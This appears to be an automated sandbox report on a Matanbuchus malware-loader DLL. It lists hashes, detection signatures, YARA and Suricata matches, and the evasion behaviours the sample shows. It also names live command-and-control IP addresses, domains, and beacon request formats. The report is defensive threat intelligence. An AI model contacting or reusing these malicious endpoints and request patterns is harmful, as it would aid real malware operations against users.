Windows Analysis Report
file.dll

Overview

General Information

Sample name: file.dll
Analysis ID: 1526602
MD5: 0fcf31b2d27079babd1fa08ff5e302ae
SHA1: f896d351d98b7605280b3e5eb923254b73b0c6ad
SHA256: 673a791fe9d1be41e6ef53b640f22b6be06263cf4176874223178e24090b76e7
Tags: dllinit-module, Matanbuchus, user-Bitsight

Detection

Matanbuchus
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Matanbuchus
AI detected suspicious sample
Uses known network protocols on non-standard ports
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name: Matanbuchus
Description: According to PCrisk, Matanbuchus is a loader-type malicious program offered by its developers as Malware-as-a-Service (MaaS). This piece of software is designed to cause chain infections. Since it is used as a MaaS, both the malware it infiltrates into systems and the attack reasons can vary, depending on the cyber criminals operating it. Matanbuchus has been observed being used in attacks against US universities and high schools, as well as a Belgian high-tech organization.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.matanbuchus

AV Detection

Source: https://semurox.com/account.aspx Virustotal: Detection: 8%
Source: C:\Users\user\8f08\user-PC\user-PC.ocx Virustotal: Detection: 16%
Source: file.dll Virustotal: Detection: 16%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.dll Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL
Source: unknown HTTPS traffic detected: 193.109.85.27:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 193.109.85.31:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown HTTPS traffic detected: 193.109.85.31:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown HTTPS traffic detected: 193.109.85.31:443 -> 192.168.2.7:49710 version: TLS 1.2

Networking

Source: Network traffic Suricata IDS: 2034468 - Severity 1 - ET MALWARE Matanbuchus Loader CnC M3 : 192.168.2.7:49763 -> 193.109.85.31:54801
Source: Network traffic Suricata IDS: 2034468 - Severity 1 - ET MALWARE Matanbuchus Loader CnC M3 : 192.168.2.7:49994 -> 193.109.85.31:54801
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 193.109.85.27 443
Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 193.109.85.31 54801
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 54801
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 54801
Source: unknown Network traffic detected: HTTP traffic on port 54801 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 54801 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 54801
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 54801
Source: unknown Network traffic detected: HTTP traffic on port 54801 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 54801 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 54801
Source: unknown Network traffic detected: HTTP traffic on port 54801 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 54801
Source: unknown Network traffic detected: HTTP traffic on port 54801 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 49992 -> 54801
Source: unknown Network traffic detected: HTTP traffic on port 49993 -> 54801
Source: unknown Network traffic detected: HTTP traffic on port 54801 -> 49992
Source: unknown Network traffic detected: HTTP traffic on port 54801 -> 49993
Source: unknown Network traffic detected: HTTP traffic on port 49994 -> 54801
Source: unknown Network traffic detected: HTTP traffic on port 54801 -> 49994
Source: global traffic TCP traffic: 192.168.2.7:49763 -> 193.109.85.31:54801
Source: Joe Sandbox View ASN Name: M247GB M247GB
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3B4560 socket,gethostbyname,connect,send,recv,std::ios_base::_Ios_base_dtor, 14_2_7F3B4560
Source: global traffic HTTP traffic detected: GET /account.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: semurox.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /detalis.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: vilodeqa.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /detalis.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: vilodeqa.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /detalis.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: vilodeqa.comCache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: semurox.com
Source: global traffic DNS traffic detected: DNS query: vilodeqa.com
Source: unknown HTTP traffic detected: POST /blueoceansite/templates/docs/index.php HTTP/1.1User-Agent: Microsoft-WNS/10.0Host: vilodeqa.comContent-Length: 581Content-Type: application/x-www-form-urlencodedAccept-Language: fr-CA
Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown HTTPS traffic detected: 193.109.85.27:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 193.109.85.31:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown HTTPS traffic detected: 193.109.85.31:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown HTTPS traffic detected: 193.109.85.31:443 -> 192.168.2.7:49710 version: TLS 1.2

System Summary

Source: file.dll, type: SAMPLE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: sslproxydump.pcap, type: PCAP Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 34.2.regsvr32.exe.6b810000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 14.2.rundll32.exe.6d050000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 14.2.rundll32.exe.4910000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 18.2.rundll32.exe.6d050000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 22.2.rundll32.exe.6d050000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 14.2.rundll32.exe.4910000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 34.2.regsvr32.exe.7ee40000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 34.2.regsvr32.exe.7ee40000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 14.2.rundll32.exe.7f330000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 14.2.rundll32.exe.7f330000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 14.2.rundll32.exe.7f330000.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 14.2.rundll32.exe.7f330000.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 34.2.regsvr32.exe.7ee40000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 34.2.regsvr32.exe.7ee40000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 18.2.rundll32.exe.7ed40000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 18.2.rundll32.exe.7ed40000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 18.2.rundll32.exe.7ed40000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 18.2.rundll32.exe.7ed40000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 0000000E.00000002.3111806010.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000022.00000002.3112823931.000000006B811000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000016.00000002.1885875877.000000006D051000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000012.00000002.3112574505.0000000005081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 00000012.00000002.3112574505.0000000005081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000022.00000002.3112253212.00000000056DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 00000022.00000002.3112253212.00000000056DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 0000000E.00000002.3112462220.0000000004BA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 0000000E.00000002.3112462220.0000000004BA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 0000000E.00000002.3113053269.000000006D051000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000012.00000002.3113049716.000000006D051000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000012.00000002.3114291162.000000007ED40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 00000012.00000002.3114291162.000000007ED40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: C:\Users\user\8f08\user-PC\user-PC.ocx, type: DROPPED Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3A9EF0 14_2_7F3A9EF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3AFA00 14_2_7F3AFA00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3728BF 14_2_7F3728BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3B4560 14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F35B5AE 14_2_7F35B5AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F36DF4E 14_2_7F36DF4E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3BFFE0 14_2_7F3BFFE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F39AFC0 14_2_7F39AFC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F35ED38 14_2_7F35ED38
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F36ED68 14_2_7F36ED68
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F36CD55 14_2_7F36CD55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F36CDD8 14_2_7F36CDD8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3DDDCB 14_2_7F3DDDCB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F36CC31 14_2_7F36CC31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F35DC1C 14_2_7F35DC1C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F39CC60 14_2_7F39CC60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F365C4E 14_2_7F365C4E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F372CBF 14_2_7F372CBF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F372A3F 14_2_7F372A3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F364A3B 14_2_7F364A3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F36DA03 14_2_7F36DA03
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F35DA02 14_2_7F35DA02
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3DDA66 14_2_7F3DDA66
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3E1ABD 14_2_7F3E1ABD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3ECAEF 14_2_7F3ECAEF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F36693B 14_2_7F36693B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3D8940 14_2_7F3D8940
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3D699D 14_2_7F3D699D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F373992 14_2_7F373992
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F35A9E3 14_2_7F35A9E3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F36A8E8 14_2_7F36A8E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3678CD 14_2_7F3678CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F368670 14_2_7F368670
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F35A696 14_2_7F35A696
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3DD6D8 14_2_7F3DD6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F397510 14_2_7F397510
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F35A430 14_2_7F35A430
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F36C426 14_2_7F36C426
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F36C44C 14_2_7F36C44C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F36C448 14_2_7F36C448
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3594FF 14_2_7F3594FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F36B32B 14_2_7F36B32B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3E53AC 14_2_7F3E53AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3D2390 14_2_7F3D2390
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F36C27E 14_2_7F36C27E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F364128 14_2_7F364128
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F39F190 14_2_7F39F190
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3A8180 14_2_7F3A8180
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDB9EF0 18_2_7EDB9EF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDBFA00 18_2_7EDBFA00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED83972 18_2_7ED83972
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED6B5AE 18_2_7ED6B5AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDC4560 18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED9AE30 18_2_7ED9AE30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDAAFC0 18_2_7EDAAFC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDCFFE0 18_2_7EDCFFE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED7DF4E 18_2_7ED7DF4E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED75C4E 18_2_7ED75C4E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDACC60 18_2_7EDACC60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED7CC31 18_2_7ED7CC31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED7CDD8 18_2_7ED7CDD8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDEDDCB 18_2_7EDEDDCB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED7CD55 18_2_7ED7CD55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED7ED68 18_2_7ED7ED68
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED6ED38 18_2_7ED6ED38
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDFCAEF 18_2_7EDFCAEF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDF1ABD 18_2_7EDF1ABD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDEDA66 18_2_7EDEDA66
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED9EA10 18_2_7ED9EA10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED6DA02 18_2_7ED6DA02
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED7DA03 18_2_7ED7DA03
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED74A3B 18_2_7ED74A3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDA0B80 18_2_7EDA0B80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED778CD 18_2_7ED778CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED7A8E8 18_2_7ED7A8E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED6A9E3 18_2_7ED6A9E3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDE699D 18_2_7EDE699D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDE8940 18_2_7EDE8940
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED7693B 18_2_7ED7693B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDED6D8 18_2_7EDED6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED6A696 18_2_7ED6A696
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED78670 18_2_7ED78670
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED9C790 18_2_7ED9C790
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDCC7B0 18_2_7EDCC7B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED994D0 18_2_7ED994D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED824EC 18_2_7ED824EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED824E2 18_2_7ED824E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED7C44C 18_2_7ED7C44C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED7C448 18_2_7ED7C448
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED6A430 18_2_7ED6A430
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED7C426 18_2_7ED7C426
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDB1540 18_2_7EDB1540
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDA7510 18_2_7EDA7510
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDB5520 18_2_7EDB5520
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDB32D0 18_2_7EDB32D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED7C27E 18_2_7ED7C27E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDE2390 18_2_7EDE2390
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDF53AC 18_2_7EDF53AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED7B32B 18_2_7ED7B32B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDAF190 18_2_7EDAF190
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDB8180 18_2_7EDB8180
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED74128 18_2_7ED74128
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEB9EF0 34_2_7EEB9EF0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEBFA00 34_2_7EEBFA00
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE828BF 34_2_7EE828BF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE6B5AE 34_2_7EE6B5AE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEC4560 34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EECFFE0 34_2_7EECFFE0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEAAFC0 34_2_7EEAAFC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE7DF4E 34_2_7EE7DF4E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE82CBF 34_2_7EE82CBF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEACC60 34_2_7EEACC60
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE75C4E 34_2_7EE75C4E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE7CC31 34_2_7EE7CC31
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE6DC1C 34_2_7EE6DC1C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEEDDCB 34_2_7EEEDDCB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE7CDD8 34_2_7EE7CDD8
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE7ED68 34_2_7EE7ED68
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE7CD55 34_2_7EE7CD55
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE6ED38 34_2_7EE6ED38
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEFCAEF 34_2_7EEFCAEF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEF1ABD 34_2_7EEF1ABD
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEEDA66 34_2_7EEEDA66
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE82A3F 34_2_7EE82A3F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE74A3B 34_2_7EE74A3B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE6DA02 34_2_7EE6DA02
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE7DA03 34_2_7EE7DA03
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE7A8E8 34_2_7EE7A8E8
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE778CD 34_2_7EE778CD
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE6A9E3 34_2_7EE6A9E3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEE699D 34_2_7EEE699D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE83992 34_2_7EE83992
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEE8940 34_2_7EEE8940
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE7693B 34_2_7EE7693B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEED6D8 34_2_7EEED6D8
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE6A696 34_2_7EE6A696
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE78670 34_2_7EE78670
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE694FF 34_2_7EE694FF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE7C44C 34_2_7EE7C44C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE7C448 34_2_7EE7C448
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE7C426 34_2_7EE7C426
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE6A430 34_2_7EE6A430
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEA7510 34_2_7EEA7510
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE7C27E 34_2_7EE7C27E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEF53AC 34_2_7EEF53AC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEE2390 34_2_7EEE2390
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE7B32B 34_2_7EE7B32B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEB8180 34_2_7EEB8180
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEAF190 34_2_7EEAF190
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE74128 34_2_7EE74128
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 7EDE1850 appears 33 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 7EDEF80D appears 128 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 7F3DF80D appears 128 times
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: String function: 7EEEF80D appears 128 times
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 608
Source: file.dll Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL
